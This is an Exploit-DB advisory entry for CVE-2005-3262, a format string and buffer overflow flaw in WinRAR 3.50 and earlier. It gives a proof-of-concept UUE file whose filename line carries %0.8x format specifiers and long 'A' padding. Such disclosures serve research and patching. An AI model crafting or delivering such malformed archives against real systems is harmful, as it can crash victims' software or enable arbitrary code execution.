RARLAB WinRar 2.90/3.x UUE/XXE Invalid Filename Error Message Format String

2005-10-11T00:00:00
ID EDB-ID:26342
Type exploitdb
Reporter Tan Chew Keong
Modified 2005-10-11T00:00:00

Description

RARLAB WinRar 2.90/3.x UUE/XXE Invalid Filename Error Message Format String. CVE-2005-3262 . Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/15062/info

WinRAR is prone to multiple remote vulnerabilities. These issues include a format string and a buffer overflow vulnerability. Successful exploitation may allow an attacker to execute arbitrary code on a vulnerable computer.

WinRAR 3.50 and prior versions are vulnerable to these issues. 

begin 644 %0.8x.%0.8x.%0.8x.%0.8x.%0.8xAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
`
end